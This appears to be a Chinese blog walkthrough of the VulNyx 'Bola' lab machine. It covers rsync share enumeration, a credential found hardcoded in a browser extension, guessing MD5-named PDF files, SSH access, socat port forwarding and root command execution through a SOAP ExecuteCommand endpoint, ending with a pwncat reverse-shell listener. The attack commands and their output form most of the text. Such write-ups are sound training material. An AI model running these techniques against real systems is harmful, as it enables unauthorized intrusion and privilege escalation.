Pepster'Blog
Vulnyx-Bola-Walkthrough
城南花已开 Lv6
  2025-02-16 15:47:38   2025-04-18 23:34:08    3.2k 字  18 分钟  

信息收集

服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.187  08:00:27:1d:c6:76       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:fd:65:82       VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.032 seconds (125.98 hosts/sec). 4 responded
export ip=192.168.60.187
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I don't always scan ports, but when I do, I prefer RustScan.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.187:22
Open 192.168.60.187:80
Open 192.168.60.187:873
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-16 15:48 CST
Initiating ARP Ping Scan at 15:48
Scanning 192.168.60.187 [1 port]
Completed ARP Ping Scan at 15:48, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:48
Completed Parallel DNS resolution of 1 host. at 15:48, 0.00s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:48
Scanning 192.168.60.187 [3 ports]
Discovered open port 22/tcp on 192.168.60.187
Discovered open port 873/tcp on 192.168.60.187
Discovered open port 80/tcp on 192.168.60.187
Completed SYN Stealth Scan at 15:48, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.60.187
Host is up, received arp-response (0.00086s latency).
Scanned at 2025-02-16 15:48:05 CST for 0s

PORT    STATE SERVICE REASON
22/tcp  open  ssh     syn-ack ttl 64
80/tcp  open  http    syn-ack ttl 64
873/tcp open  rsync   syn-ack ttl 64
MAC Address: 08:00:27:1D:C6:76 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

访问80端口,编辑一下hosts 添加域名

1
2
sudo vim /etc/hosts
192.168.60.187  bola.nyx

扫一下目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
❯ feroxbuster -u http://bola.nyx

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://bola.nyx
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      270c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      304c http://bola.nyx/admin => http://bola.nyx/admin/
200      GET       72l      215w     2882c http://bola.nyx/login/login.php
301      GET        9l       28w      309c http://bola.nyx/javascript => http://bola.nyx/javascript/
301      GET        9l       28w      309c http://bola.nyx/admin/pdfs => http://bola.nyx/admin/pdfs/
301      GET        9l       28w      310c http://bola.nyx/admin/icons => http://bola.nyx/admin/icons/
301      GET        9l       28w      316c http://bola.nyx/javascript/jquery => http://bola.nyx/javascript/jquery/
200      GET    10907l    44549w   289782c http://bola.nyx/javascript/jquery/jquery
[####################] - 44s   210025/210025  0s      found:9       errors:0
[####################] - 38s    30000/30000   798/s   http://bola.nyx/
[####################] - 38s    30000/30000   785/s   http://bola.nyx/admin/
[####################] - 43s    30000/30000   705/s   http://bola.nyx/javascript/
[####################] - 41s    30000/30000   725/s   http://bola.nyx/admin/icons/
[####################] - 42s    30000/30000   714/s   http://bola.nyx/admin/pdfs/
[####################] - 42s    30000/30000   720/s   http://bola.nyx/login/
[####################] - 40s    30000/30000   752/s   http://bola.nyx/javascript/jquery/

得到一个登录界面

我尝试sql注入无果

尝试重新注册一个再次登录提示邮箱或密码无效

image

那只能换个端口了

rsync目录枚举

还有一个873端口,主要用于rsync数据同步

873 - 渗透测试 Rsync - HackTricks

参考命令,尝试枚举不需要身份验证的文件

写个脚本,得到文件夹extensions可以进行读取

1
2
3
4
5
6
7
8
9
10
11
for i in $(cat /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt);do echo $i;rsync -av --list-only rsync://$ip/$i 2>&1|grep -Piv "error" ;done
…………省略…………
extensions
receiving incremental file list
drwxr-xr-x          4,096 2025/02/06 00:43:23 .
-rw-r--r--         93,553 2025/02/05 23:42:57 Password_manager_FirefoxExtension-VulNyx.pdf
-rw-r--r--         30,811 2025/02/05 23:31:41 password_manager.zip

sent 20 bytes  received 137 bytes  314.00 bytes/sec
total size is 124,364  speedup is 792.13
…………省略…………

通过rsync同步到本地

解压一下压缩包,还有一个pdf文件

得到网页的源代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
❯ rsync -av rsync://$ip:873/extensions ./rsyn_shared
receiving incremental file list
created directory ./rsyn_shared
./
Password_manager_FirefoxExtension-VulNyx.pdf
password_manager.zip

sent 65 bytes  received 124,610 bytes  249,350.00 bytes/sec
total size is 124,364  speedup is 1.00
cd rsyn_shared
❯ x password_manager.zip
extract: extracting to password_manager
Archive:  /home/Pepster/vulnyx/rsyn_shared/password_manager.zip
  inflating: background.js
  inflating: icon.png
  inflating: manifest.json
  inflating: popup.html
  inflating: popup.js
  inflating: styles.css

起初我以为是pdf隐写之类的操作,结果后面密码就藏在js代码中

藏在background.js的第四行

1
2
3
4
5
6
7
❯ grep -Pnir 'user' .
./password_manager/popup.js:18:                <div><strong>Username:</strong> ${entry.username}</div>
./password_manager/popup.js:62:    const username = document.getElementById("username").value.trim();
./password_manager/popup.js:65:    if (!site || !username || !password) {
./password_manager/popup.js:73:        passwords.push({ site, username, password });
./password_manager/popup.html:15:        <input type="text" id="username" placeholder="Username" required />
./password_manager/background.js:4:        { site: "bola.nyx", username: "[email protected]", password: "sbIJ0x9g{C3`" }

利用此凭据尝试登录一下web

进入之后只有一个文件可以下载

image

翻译一下,得知是WSDL的说明文档

image

web服务的描述语言,但这有啥用啊

既然提示了那必然是有关这个方向的

没啥信息

敏感文件泄露

换个字典再扫一下目录

得到了.well-known

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
❯ feroxbuster -u http://bola.nyx -w /usr/share/seclists/Discovery/Web-Content/common.txt

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://bola.nyx
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/common.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      270c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       49l       70w     1116c http://bola.nyx/.well-known/openid-configuration
200      GET        3l        7w       97c http://bola.nyx/.well-known/security.txt
301      GET        9l       28w      304c http://bola.nyx/admin => http://bola.nyx/admin/
200      GET       71l      180w     1660c http://bola.nyx/index.php
301      GET        9l       28w      309c http://bola.nyx/javascript => http://bola.nyx/javascript/
301      GET        9l       28w      304c http://bola.nyx/login => http://bola.nyx/login/
200      GET       72l      215w     2882c http://bola.nyx/login/login.php
200      GET       71l      180w     1660c http://bola.nyx/
302      GET        0l        0w        0c http://bola.nyx/admin/admin.php => http://bola.nyx/login/login.php
301      GET        9l       28w      310c http://bola.nyx/admin/icons => http://bola.nyx/admin/icons/
301      GET        9l       28w      316c http://bola.nyx/javascript/jquery => http://bola.nyx/javascript/jquery/
200      GET    10907l    44549w   289782c http://bola.nyx/javascript/jquery/jquery
301      GET        9l       28w      309c http://bola.nyx/admin/pdfs => http://bola.nyx/admin/pdfs/
[####################] - 11s    33170/33170   0s      found:13      errors:0
[####################] - 5s      4735/4735    925/s   http://bola.nyx/
[####################] - 9s      4735/4735    531/s   http://bola.nyx/admin/
[####################] - 6s      4735/4735    804/s   http://bola.nyx/javascript/
[####################] - 9s      4735/4735    557/s   http://bola.nyx/login/
[####################] - 7s      4735/4735    652/s   http://bola.nyx/admin/icons/
[####################] - 8s      4735/4735    601/s   http://bola.nyx/javascript/jquery/
[####################] - 4s      4735/4735    1070/s  http://bola.nyx/admin/pdfs/

curl一下,是个openid的配置文件,其中有三个用户名d4t4s3c jackie0x17 ct0l4

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
❯ curl http://bola.nyx/.well-known/openid-configuration
{
    "issuer": "https:\/\/bola.nyx",
    "authorization_endpoint": "https:\/\/bola.nyx\/auth",
    "token_endpoint": "https:\/\/bola.nyx\/token",
    "userinfo_endpoint": "https:\/\/bola.nyx\/userinfo",
    "jwks_uri": "https:\/\/bola.nyx\/jwks.json",
    "response_types_supported": [
        "code",
        "token",
        "id_token"
    ],
    "grant_types_supported": [
        "authorization_code",
        "implicit"
    ],
    "subject_types_supported": [
        "public"
    ],
    "id_token_signing_alg_values_supported": [
        "RS256"
    ],
    "scopes_supported": [
        "openid",
        "profile",
        "email"
    ],
    "claims_supported": [
        "sub",
        "name",
        "email"
    ],
    "userinfo": [
        {
            "sub": "d4t4s3c",
            "name": "d4t4s3c",
            "email": "[email protected]"
        },
        {
            "sub": "jackie0x17",
            "name": "jackie0x17",
            "email": "[email protected]"
        },
        {
            "sub": "ct0l4",
            "name": "ct0l4",
            "email": "[email protected]"
        }
    ]
}%

到这,我原本以为可以hydra爆破ssh即可

尝试无果后,卡住了

不过后面看文件名长度是32位,遂猜测是由某个用户名的md5加密而来

验证一下

1
2
3
4
5
echo -n "115a2cf084dd7e70a91187f799a7d5a8"|wc -c
32
echo -n 'jackie0x17'|md5sum
115a2cf084dd7e70a91187f799a7d5a8  -

猜测其他用户也可能存在pdf文件

1
2
3
4
5
echo -n 'd4t4s3c'|md5sum
97035ded598faa2ce8ff63f7f9dd3b70  -
echo -n 'ct0l4'|md5sum
4a8f81d01d65d3468955191045816c85  -

修改一下链接

http://bola.nyx/download.php?file_name=97035ded598faa2ce8ff63f7f9dd3b70.pdf

得到一个由d4t4s3c md5后的文件

从中得到一个用户凭证VulNyxtestinglogin123

image

用户提权

尝试ssh连接,失败了,换个用户名即可

拿到user了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
❯ ssh d4t4s3c@$ip
The authenticity of host '192.168.60.187 (192.168.60.187)' can't be established.
ED25519 key fingerprint is SHA256:q2oJVk8pvyNE1iEAucoSG9iwm1MeIlnMRT7L9fXkqzI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.187' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux bola 6.1.0-30-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.124-1 (2025-01-12) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Feb  6 09:33:51 2025 from 192.168.1.50
d4t4s3c@bola:~$ cat user.txt
4e62a268197ebd869b7bafe859e35d00

端口转发

再次进行信息收集

得知本地开放33069000端口

1
2
3
4
5
6
7
8
9
10
11
d4t4s3c@bola:/tmp$ ss -luntp
Netid         State           Recv-Q          Send-Q                   Local Address:Port                   Peer Address:Port         Process
udp           UNCONN          0               0                              0.0.0.0:68                          0.0.0.0:*
tcp           LISTEN          0               80                           127.0.0.1:3306                        0.0.0.0:*
tcp           LISTEN          0               5                              0.0.0.0:873                         0.0.0.0:*
tcp           LISTEN          0               128                            0.0.0.0:22                          0.0.0.0:*
tcp           LISTEN          0               5                            127.0.0.1:9000                        0.0.0.0:*
tcp           LISTEN          0               5                                 [::]:873                            [::]:*
tcp           LISTEN          0               511                                  *:80                                *:*
tcp           LISTEN          0               128                               [::]:22                             [::]:*

利用socat将9000端口转发出来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
d4t4s3c@bola:/tmp$ wget 192.168.60.100/socat
--2025-02-16 11:15:27--  http://192.168.60.100/socat
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 473256 (462K) [application/octet-stream]
Saving to: ‘socat’

socat                                 100%[=======================================================================>] 462.16K  --.-KB/s    in 0.02s

2025-02-16 11:15:27 (24.8 MB/s) - ‘socat’ saved [473256/473256]

d4t4s3c@bola:/tmp$ chmod +x socat
d4t4s3c@bola:/tmp$ socat TCP-LISTEN:9001,fork TCP4:127.0.0.1:9000&
------------------分隔------------------
❯ nmap -p 9001 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-16 17:18 CST
Nmap scan report for bola.nyx (192.168.60.187)
Host is up (0.00054s latency).

PORT     STATE SERVICE
9001/tcp open  tor-orport
MAC Address: 08:00:27:1D:C6:76 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds

Root提权

我们根据前文的文档来访问WSDL

curl拿到xml,丢给GPT

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
❯ curl http://bola.nyx:9001/wsdl
<definitions name="VulNyxSOAP"
   targetNamespace="http://localhost/wsdl/VulNyxSOAP.wsdl"
   xmlns="http://schemas.xmlsoap.org/wsdl/"
   xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
   xmlns:tns="http://localhost/wsdl/VulNyxSOAP.wsdl"
   xmlns:xsd="http://www.w3.org/2001/XMLSchema">

   <message name="LoginRequest">
      <part name="username" element="username"/>
      <part name="password" element="password"/>
   </message>

   <message name="LoginResponse">
      <part name="status" type="string"/>
   </message>

   <message name="ExecuteCommandRequest">
      <part name="cmd" element="cmd"/>
   </message>

   <message name="ExecuteCommandResponse">
      <part name="output" element="cmd"/>
   </message>

   <portType name="VulNyxSOAPPortType">
      <operation name="Login">
         <input message="tns:LoginRequest"/>
         <output message="tns:LoginResponse"/>
      </operation>
      <operation name="ExecuteCommand">
         <input message="tns:ExecuteCommandRequest"/>
         <output message="tns:ExecuteCommandResponse"/>
      </operation>
   </portType>

   <binding name="VulNyxSOAPBinding" type="tns:VulNyxSOAPPortType">
      <soap:binding style="rpc"
         transport="http://schemas.xmlsoap.org/soap/http"/>
      <operation name="Login">
         <soap:operation soapAction="Login"/>
         <input>
            <soap:body use="literal"/>
         </input>
         <output>
            <soap:body use="literal"/>
         </output>
      </operation>
      <operation name="ExecuteCommand">
         <soap:operation soapAction="ExecuteCommand"/>
         <input>
            <soap:body use="literal"/>
         </input>
         <output>
            <soap:body use="literal"/>
         </output>
      </operation>
   </binding>

   <service name="VulNyxSOAP">
      <port binding="tns:VulNyxSOAPBinding" name="VulNyxSOAPPort">
         <soap:address location="http://localhost:9000/wsdl/" />
      </port>
   </service>
</definitions>

命令执行

发现接口定义,可以执行命令操作

利用Api fox可以导入WSDL数据

使用xml内容进行POST传参

一下子变成开发测试的环境了,哈哈哈🤣

image

测试一下能否执行

1
2
3
4
5
6
7
8
9
10
11
<?xml version='1.0' encoding='UTF-8'?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                  xmlns:tns="http://localhost/wsdl">
   <soapenv:Body>
      <tns:ExecuteCommand>
        <tns:cmd>
          id
        </tns:cmd>
      </tns:ExecuteCommand>
   </soapenv:Body>
</soapenv:Envelope>

以root身份运行的

image

反弹个shell,监听一下端口

结束了,在上面直接cat root/root.txt也行,更快

但我更倾向于拿到root shell

1
2
3
4
5
6
7
8
9
10
11
12
❯ pwncat-cs -lp 4444
[18:54:45] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
[18:55:03] received connection from 192.168.60.187:46106                                                                                    bind.py:84
[18:55:03] 0.0.0.0:4444: normalizing shell path                                                                                         manager.py:957
           0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash                                                                  manager.py:957
[18:55:04] 192.168.60.187:46106: registered new host w/ db                                                                              manager.py:957
(local) pwncat$
(remote) root@bola:/root/projects/wsdl_server# cat /root/root.txt
8930fba2c5f4da4e76ceb626f8f5454a
(remote) root@bola:/root/projects/wsdl_server# id
uid=0(root) gid=0(root) groups=0(root)

  1. 信息收集
    1. 服务探测
    2. rsync目录枚举
    3. 敏感文件泄露
  2. 用户提权
    1. 端口转发
  3. Root提权
    1. 命令执行
© 2024 - 2025    城南花已开
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 502.5k
  1. 信息收集
    1. 服务探测
    2. rsync目录枚举
    3. 敏感文件泄露
  2. 用户提权
    1. 端口转发
  3. Root提权
    1. 命令执行